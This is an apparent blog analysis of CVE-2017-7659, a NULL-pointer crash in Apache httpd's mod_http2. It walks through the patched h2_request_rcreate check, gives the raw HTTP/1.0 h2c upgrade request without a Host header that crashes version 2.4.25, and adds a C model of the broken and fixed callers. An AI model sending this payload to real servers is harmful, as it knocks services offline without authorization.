Apache CVE-2017-7659 Issue Analysis

This article shows the detail of CVE-2017-7659 vulnerability, and also shows how to develop a CVE-2017-7659 payload.

Recently, Apache released Apache httpd 2.4.26, which fixes several issues. You can find the details of the patch at this link. CVE-2017-7659 is one of those issues.

For CVE-2017-7659, Apache provides the following description:

A maliciously constructed HTTP/2 request could cause mod_http2 to dereference a NULL pointer and crash the server process.

From the GitHub change log, we can see that only one line changed: the code now checks the return value of the h2_request_rcreate function.

[Figure: h2_stream.c change log]

CVE-2017-7659 is related to the h2_request_rcreate function, so let's look at that function.

Reading the affected code, we can see that Apache httpd uses the h2_request_rcreate function to create the HTTP/2 request data structure req. If h2_request_rcreate fails, req is left as NULL. When ap_log_rerror then uses it, the NULL dereference brings the HTTP process down.

[Figure: ap_log_rerror source code]

Now let's go to the h2_request_rcreate function itself. At the beginning, this function sets req to 0 (NULL), then checks four variables: r->method, scheme, r->hostname and path. If any of these variables is NULL, it returns a failure status. On that failure path req is still 0, and the caller's dereference brings the HTTP process down.

[Figure: h2_request_rcreate function]

Of the variables above, only the hostname is controlled by the client, and it can be NULL. Therefore, an HTTP request without a hostname will bring down the Apache httpd process.

Now, let's create the CVE-2017-7659 payload. To trigger this issue, the following requirements must be met:

  1. The target website supports HTTP/2.
  2. We are able to submit an HTTP/1.0 request without a Host header.

The following HTTP request is the payload:

GET / HTTP/1.0
User-Agent: curl/7.50.1
Accept: */*
Connection: Upgrade, HTTP2-Settings
Upgrade: h2c
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 2
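To make the one-line fix and the failure path described above concrete, here is an added C example written for this article; it is a simplified model, not Apache's own code or API. It models h2_request_rcreate (req is reset to NULL, and creation fails when method, scheme, hostname or path is missing), shows the pre-fix caller that dereferences req without checking the status beside the fixed caller that checks it first, and feeds both from a small parser that pulls the request line and the Host header out of a raw request, so that a request shaped like the payload above (no Host header) is what drives the failure path. The names h2_request_model, h2_request_rcreate_model, upgrade_before_fix, upgrade_after_fix, find_header, check_upgrade_request, the status codes and the two sample requests are all assumptions of this example; the sample requests are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified model of mod_http2's request struct (added example, not Apache's code). */
typedef struct { const char *method, *scheme, *authority, *path; } h2_request_model;
enum { MODEL_OK = 0, MODEL_EINVAL = 1, MODEL_ENOMEM = 2 };

/* Model of h2_request_rcreate: *preq is reset to NULL first and creation fails if
 * method, scheme, hostname or path is missing. Only hostname is client-controlled,
 * so a request with no Host header takes the failure path and leaves *preq NULL. */
int h2_request_rcreate_model(h2_request_model **preq, const char *method,
                             const char *scheme, const char *hostname, const char *path)
{
    *preq = NULL;
    if (!method || !scheme || !hostname || !path) return MODEL_EINVAL;
    h2_request_model *req = calloc(1, sizeof *req);
    if (!req) return MODEL_ENOMEM;
    req->method = method; req->scheme = scheme; req->authority = hostname; req->path = path;
    *preq = req;
    return MODEL_OK;
}

/* Caller shaped like the pre-2.4.26 code: the status is ignored and req is used at
 * once (the ap_log_rerror call in the original), so a NULL hostname means a NULL
 * dereference. Shown for comparison; never called here with a missing hostname. */
const char *upgrade_before_fix(const char *method, const char *hostname, const char *path)
{
    h2_request_model *req;
    h2_request_rcreate_model(&req, method, "http", hostname, path);
    const char *p = req->path;          /* crashes when creation failed */
    free(req);
    return p;
}

/* Caller shaped like the fixed code: check the status before touching req. */
int upgrade_after_fix(const char *method, const char *hostname, const char *path,
                      char *out, size_t outlen)
{
    h2_request_model *req;
    int status = h2_request_rcreate_model(&req, method, "http", hostname, path);
    if (status != MODEL_OK) {
        snprintf(out, outlen, "h2c upgrade rejected: incomplete request (status %d)", status);
        return status;
    }
    snprintf(out, outlen, "%s %s://%s%s", req->method, req->scheme, req->authority, req->path);
    free(req);
    return MODEL_OK;
}

/* Copy the value of header `name` (matched case-insensitively) into buf; 0 if absent. */
static int find_header(const char *raw, const char *name, char *buf, size_t buflen)
{
    size_t nlen = strlen(name), i;
    const char *line = raw;
    while ((line = strchr(line, '\n')) != NULL) {
        line++;                                               /* start of the next line */
        if (*line == '\r' || *line == '\n' || !*line) break;  /* blank line ends headers */
        for (i = 0; i < nlen && tolower((unsigned char)line[i]) == tolower((unsigned char)name[i]); i++) ;
        if (i < nlen || line[nlen] != ':') continue;
        const char *v = line + nlen + 1;
        while (*v == ' ' || *v == '\t') v++;
        size_t len = strcspn(v, "\r\n");
        if (len >= buflen) len = buflen - 1;
        memcpy(buf, v, len);
        buf[len] = '\0';
        return 1;
    }
    return 0;
}

static char last_msg[256];
const char *check_upgrade_last_message(void) { return last_msg; }

/* Parse a raw HTTP/1.x request (method, path, Host) and run it through the fixed
 * upgrade path. Returns MODEL_OK, or MODEL_EINVAL when the request has no Host. */
int check_upgrade_request(const char *raw)
{
    char method[16], path[256], host[256];
    if (sscanf(raw, "%15s %255s", method, path) != 2) {
        snprintf(last_msg, sizeof last_msg, "malformed request line");
        return MODEL_EINVAL;
    }
    const char *hostname = find_header(raw, "Host", host, sizeof host) ? host : NULL;
    return upgrade_after_fix(method, hostname, path, last_msg, sizeof last_msg);
}

/* Constructed samples: the request shape from the article (no Host header) and an
 * ordinary h2c upgrade request that carries one. */
const char *SAMPLE_NO_HOST =
    "GET / HTTP/1.0\r\nUser-Agent: curl/7.50.1\r\nAccept: */*\r\n"
    "Connection: Upgrade, HTTP2-Settings\r\nUpgrade: h2c\r\n"
    "HTTP2-Settings: AAMAAABkAAQAAP__\r\nContent-Length: 2\r\n\r\n";
const char *SAMPLE_WITH_HOST =
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\nConnection: Upgrade, HTTP2-Settings\r\n"
    "Upgrade: h2c\r\nHTTP2-Settings: AAMAAABkAAQAAP__\r\n\r\n";

int main(void)
{
    int s = check_upgrade_request(SAMPLE_NO_HOST);
    printf("no Host   -> status %d: %s\n", s, check_upgrade_last_message());
    s = check_upgrade_request(SAMPLE_WITH_HOST);
    printf("with Host -> status %d: %s\n", s, check_upgrade_last_message());
    return 0;
}
```

Build it with `cc -o h2check h2check.c` and run it: the request with no Host header comes back with a rejection status instead of a crash, and the request that carries a Host header is accepted. The whole difference between the two callers is the `if (status != MODEL_OK)` check, which is what the 2.4.26 change adds in h2_stream.c; upgrade_before_fix is kept only to show the shape of the unchecked dereference.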

First, I set up an Apache HTTP server on my Kali Linux. The version is 2.4.25.

[Figure: Apache HTTP version 2.4.25]

Then I start Apache; the website and server are working well.

Then I use Burp to submit the above payload to the Apache HTTP Server.

[Figure: submitting the payload]

After submitting the payload, the website gives no response. If you check the Apache log, you will find segmentation fault errors, and the httpd process is dead.

[Figure: CVE-2017-7659 leads to a DDoS attack]